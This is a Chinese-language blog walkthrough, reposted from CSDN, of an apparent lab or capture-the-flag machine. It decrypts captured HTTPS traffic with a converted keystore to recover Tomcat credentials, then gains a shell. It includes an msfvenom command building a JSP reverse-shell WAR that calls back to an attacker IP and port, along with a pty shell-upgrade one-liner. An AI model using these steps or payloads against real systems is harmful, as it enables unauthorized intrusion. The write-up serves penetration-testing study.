一、浏览器访问192.168.110.140
二、点击图片,进入后台
三、点击Employee portal进入登录后台
四、发现需要登录密码,接下来就是获得密码
按F12打开开发者模式,发现旁注里有解密后的用户和密码,用base64解码,得到用户和密码
五、登录进去之后,我们开始进行信息收集,我们发现了两条有用的信息
通过这个网址,我们下载下来了一个证书,生成的密钥文件 因为他是一个浏览器的认证所以解不开
通过这个网址我们得到了一个pcap流量包,截取攻击的流量包 我是在百度开始搜索nginx生成ssl证书 下面会介绍
六、我们来分析该流量,我们将流量包放在wireshark上,发现因为是https协议,所以都是密文的,我们无法得到什么信息
七、所以我们得想办法将其变成明文的,方便我们收集信息,这就是我们接下来的任务,我们首先知道刚才下载了一个keystore的证书,我们试着将这个证书导到wireshark中,看看可不可以,尝试过后发现不可以,流量还是密文的,后来我们知道应该讲证书转化成p12格式才可以被解析,那接下来我们来操作这步
首先我们把keystore传到moba上,然后在kali上敲
keytool -importkeystore -srckeystore /root/keystore -destkeystore /root/nima.p12 -deststoretype PKCS12 -srcalias tomcat
得到了一个nima.p12的证书,接下来我们将这个证书导到wireshark上
8443可能是https协议所以设值为他
(这一步得打个注释:我这里选的是TLS,因为是老版,新版的话直接选SSL就可以了) 解完包会变成http格式
(这里也得强调一下,这里这个IP地址写的不是目的地址,而是自己的主机IP,协议要写http,而不是https)
八、最后点击ok就导入完成了,这时我们发现流量多了http的流量,我们去追它http流,发现是明文的了,401代表登陆失败 可以判断出穿的木马
九、那我们现在可以开始收集信息了,我们在上面看到401,需要登录,往下翻发现有200状态码,说明登录成功了,那我们往上看,肯定有账号密码,然后我们发现了被加密过了的账号和密码,我们将其复制去解码器中解码,得到了账号和密码 tomcat:Tt\5D8F(#!*u=G)4m7zB
十、接下来我们去找这个需要登录的tomcat的页面,我们去分析它的流量找到了这个网址
发现从192.168.110.129到192.168.110.140的攻击流量包,其中有cmd命令马执行了id命令,攻击者上传了两张图片,疑似图片马,但是命令马无法直接访问,需要登录tomcat后台:
十一、接下来我们去浏览器访问该网址,发现无法访问,因为我们没有相应的证书,它有限制,我们新版的浏览器都不允许访问
但我们知道burp上也有各种证书,所以我们挂上代理,用burp代理放包,达到访问的目的
放包之后发现出现了登录框,我们输入上面得到的账号和密码
放包,发现了tomcat的页面
我们向上面传木马,用msf生成木马
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.110.189 lport=8989 -f war -o shandian.war
为了不用一次次的放包,我们现在直接设置成不拦截
然后访问木马,这边kali上监听
最后得到权限
我们可以使用 python -c ‘import pty;pty.spawn("/bin/bash")’ 使其有bash模式
还可以使用 id 看我们当前的权限 为tomcat6(普通用户权限)
来源:CSDN
作者:你今天真好看.
链接:https://blog.csdn.net/weixin_45345568/article/details/103493755